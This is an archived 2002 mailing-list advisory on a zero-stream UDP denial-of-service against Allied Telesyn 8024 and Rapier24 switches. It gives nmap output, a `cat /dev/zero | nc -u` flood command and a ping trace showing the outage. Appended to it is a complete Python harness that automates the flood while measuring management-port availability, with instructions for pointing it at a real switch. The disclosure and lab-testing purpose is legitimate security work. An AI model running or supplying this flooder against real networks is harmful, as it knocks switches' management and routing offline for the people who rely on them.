Allied Telesyn switches & routers vulnerability

From: Oleg A. Lebedev (techdirat_private)
Date: Wed Nov 20 2002 - 06:13:04 PST


    Hello, all
    
    The problem: zero-stream DoS against the switch!
    
    We have tested Allied Telesyn switches, the 8024 and the Rapier24, with
    the latest firmware from the AT site installed.
    
    Testing:
    
    1. Scan for open ports on switch (assume switch address 192.168.0.13):
    
    nmap -v -sT 192.168.0.13
    Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
    Host  (192.168.0.103) appears to be up ... good.
    Initiating Connect() Scan against  (192.168.0.103)
    Adding TCP port 23 (state open).
    Adding TCP port 80 (state open).
    The Connect() Scan took 4 seconds to scan 1542 ports. Interesting ports
    on  (192.168.0.103): (The 1540 ports scanned but not shown below are in
    state: closed)
    Port       State       Service
    23/tcp     open        telnet
    80/tcp     open        http
    Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds
    
    2. Send a stream of zeros to an open port (or, in the case of the 8024, to any port):
    
    cat /dev/zero | nc -u 192.168.0.13 Open_Port &
    
    Pinging 192.168.0.103 with 32 bytes of data:
    
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time=16ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    Request timed out. // Start sending zero stream: cat /dev/zero | nc -u 192.168.0.103 6789
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. 
    Request timed out. // Stop sending zero stream
    Reply from 192.168.0.103: bytes=32 time=203ms TTL=30 
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
    Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
    
    So, in the case of the 8024 it stops responding on the management interface,
    and in the case of the Rapier24 management interface access and routing both stop.
    
    The bug was reported to Allied Telesyn in July...
    
    
    
    Best Regards, Oleg A. Lebedev
    "Matrix Network Solutions" CIO
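
The following is an added lab harness, not code from the post above, that automates the test Lebedev describes: a background thread sends back-to-back UDP datagrams of zero bytes (the equivalent of `cat /dev/zero | nc -u host port`) while a second loop polls the management plane and reports availability before, during and after the flood. It probes with TCP handshakes to the telnet/http port rather than ICMP, because that needs no raw socket and a hung telnet/http listener is what an operator notices first. The `start_lab_target` function is a constructed stand-in for the switch (a TCP acceptor plus a UDP socket nobody reads) so the script runs offline; against real equipment you would call `measure("192.168.0.13", 23, 6789)` instead, and only on devices you are authorised to test, since this is a denial-of-service tool. The port numbers and thresholds are assumptions for the demonstration.

```python
"""Lab harness for a zero-stream UDP flood (added example, not from the original post).

Flood a UDP port with zero bytes while polling a TCP management port, and
summarise availability per phase. Use only against hosts you own or may test.
"""
import socket
import threading
import time

_lab_sockets = []  # keeps the constructed lab target's sockets alive


def probe_tcp(host: str, port: int, timeout: float = 1.0) -> tuple[bool, float]:
    """One management-plane probe: complete a TCP handshake to `port`.
    Returns (reachable, seconds taken). A refused or timed-out connect is 'down'."""
    t0 = time.monotonic()
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True, time.monotonic() - t0
    except OSError:
        return False, time.monotonic() - t0


def zero_stream(host: str, port: int, stop: threading.Event, stats: dict,
                chunk: int = 1400) -> None:
    """Background sender, the equivalent of `cat /dev/zero | nc -u host port`:
    connected UDP socket sending all-zero datagrams as fast as it can until `stop`."""
    payload = b"\x00" * chunk
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect((host, port))
        while not stop.is_set():
            try:
                stats["bytes"] += s.send(payload)
                stats["datagrams"] += 1
            except OSError:  # e.g. ICMP port-unreachable surfacing as ECONNREFUSED
                stats["errors"] += 1


def run_phase(name: str, host: str, mgmt_port: int, seconds: float,
              interval: float = 0.2) -> dict:
    """Poll the management port for `seconds` and summarise what fraction answered."""
    probes = ok = 0
    worst = 0.0
    deadline = time.monotonic() + seconds
    while time.monotonic() < deadline:
        reachable, rtt = probe_tcp(host, mgmt_port)
        probes += 1
        ok += reachable
        worst = max(worst, rtt)
        time.sleep(interval)
    return {"phase": name, "probes": probes,
            "available": ok / probes, "worst_rtt_s": round(worst, 3)}


def measure(host: str, mgmt_port: int, flood_port: int,
            phase_seconds: float = 2.0) -> list[dict]:
    """Baseline, then flood, then recovery: the same three phases as the ping trace."""
    results = [run_phase("baseline", host, mgmt_port, phase_seconds)]
    stop = threading.Event()
    stats = {"bytes": 0, "datagrams": 0, "errors": 0}
    sender = threading.Thread(target=zero_stream, args=(host, flood_port, stop, stats),
                              daemon=True)
    sender.start()
    results.append(run_phase("zero-stream", host, mgmt_port, phase_seconds))
    stop.set()
    sender.join()
    results[-1].update(stats)  # record how much zero traffic the phase generated
    results.append(run_phase("recovery", host, mgmt_port, phase_seconds))
    return results


def start_lab_target() -> tuple[str, int, int]:
    """Constructed stand-in for the switch so the harness runs offline:
    a TCP acceptor playing the management interface and a UDP socket that is
    never read, playing the flooded port. Returns (host, mgmt_port, flood_port)."""
    tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp.bind(("127.0.0.1", 0))
    tcp.listen(16)

    def accept_loop():
        while True:
            conn, _ = tcp.accept()
            conn.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.bind(("127.0.0.1", 0))
    _lab_sockets.extend([tcp, udp])
    return "127.0.0.1", tcp.getsockname()[1], udp.getsockname()[1]


if __name__ == "__main__":
    host, mgmt, flood = start_lab_target()
    for row in measure(host, mgmt, flood, phase_seconds=1.0):
        print(row)
```

On the loopback stand-in all three phases stay available; on a device that behaves like the 8024 in the post the "zero-stream" row drops toward zero availability and the "recovery" row shows the management port returning once the sender stops. If you also want to know whether forwarding survives (the Rapier24 case), run a second `probe_tcp` against a host on the far side of the router during the same flood.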
    



    This archive was generated by hypermail 2b30 : Sun Nov 24 2002 - 12:51:49 PST